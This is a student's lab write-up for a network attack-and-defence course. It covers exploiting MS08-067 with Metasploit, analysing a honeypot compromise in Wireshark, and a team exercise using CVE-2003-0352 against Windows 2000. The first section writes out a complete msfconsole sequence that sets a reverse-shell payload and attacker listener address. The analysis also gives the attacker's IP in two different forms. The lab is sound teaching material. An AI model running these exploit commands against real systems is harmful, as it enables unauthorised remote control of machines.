• 20211909 202120222 《网络攻防实践》第六周作业


    实验要求

    (1)动手实践Metasploit windows attacker
    任务:使用metasploit软件进行windows远程渗透统计实验
    具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
    (2)取证分析实践:解码一次成功的NT系统破解攻击。
    来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

    • 攻击者使用了什么破解工具进行攻击
    • 攻击者如何使用这个破解工具进入并控制了系统
    • 攻击者获得系统访问权限后做了什么
    • 我们如何防止这样的攻击
    • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

    (3)团队对抗实践:windows系统远程渗透攻击和分析。
    攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
    防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

    实验过程

    动手实践Metasploit windows attacker

    启动msf

    msfconsole
    

    使用ms08_067漏洞攻击模块

    use exploit/windows/smb/ms08_067_netapi
    

    设置打开反向连接的载荷

    set PAYLOAD generic/shell_reverse_tcp
    

    看一下需要设置哪些参数

    show options
    

    设置攻击的RHOST以及反向连接的监听ip LHOST。

    set RHOST 192.168.235.129
    set LHOST 172.27.109.235
    

    设置TARGET为0会自动识别靶机系统,输入exploit进行攻击

    set TARGET 0
    exploit
    

    这里不知道为啥wsl的kali打不进去

    换成虚拟机kali再打一次成功

    取证分析实践:解码一次成功的NT系统破解攻击

    下载文件后用wireshark打开,通过观察数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机,我们以这两个ip为条件筛选一下。

    ip.addr==213.116.251.162 && ip.addr==172.16.1.106
    

    这里面tcp的流量很多,先追踪tcp流看看

    在111流中,可以看到攻击者已经可以远程操控靶机了,所以权限的获取应该在这之前,我们找找之前的流

    这里的流量,这不就是Unicode漏洞攻击么,Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。这里是利用sql的方式去触发Unicode漏洞

    可以在后面的流中看到攻击者利用漏洞做了什么操作

    后面的流换了一种方式,%c0%af = /是任意文件读取漏洞,不过执行的操作好像和前面差不多

    看这个流程应该是利用sql注入、文件任意读取漏洞去执行cmd,通过nc反向回连获得shell。
    后面就是把各种信息填入对应的txt中

    接着就是一些提权操作了,比如说把自己的账户填进用户组中

    这里可以看到访问者连接到6868端口并获得了权限

    从这已经可以看出攻击者知道是蜜罐主机了

    团队对抗实践:windows系统远程渗透攻击和分析

    使用CVE-2003-0352漏洞攻击win2k。

    微软修改dcerpc框架后形成自己的RPC框架来处理进程间的通信。微软的RPC框架在处理TCP/IP信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;此漏洞影响使用RPC框架的DCOM接口,DCOM接口用来处理客户端机器发送给服务器的DCOM对象激活请求,如UNC路径。wireshark抓包分析也可以佐证,攻击机发送两个DCERPC包后便获得了靶机4444端口的访问权限和shell。

    遇到的问题

    在做第一个任务时wsl的kali无法打入,换成kali虚拟机即可解决。

  • 相关阅读:
    SpringCloud学习第四篇:Feign学习(Hoxton.SR4)
    SpringCloud学习第三篇:Ribbon负载均衡(Hoxton.SR4)
    SpringCloud学习第二篇:使用Consul注册中心(Greenwich-SR1版本)
    SpringCloud学习第一篇:服务的注册与发现Eureka(Hoxton.SR4)
    SpringBoot+Mycat+APO实现读写分离
    SpringBoot+activeMq
    自动化测试适用场景和难点
    软件测试理论
    软件测试理论中的注意事项
    python自动化:monkey测试的云测
  • 原文地址:https://www.cnblogs.com/luoleqi/p/16161064.html
Copyright © 2020-2023  润新知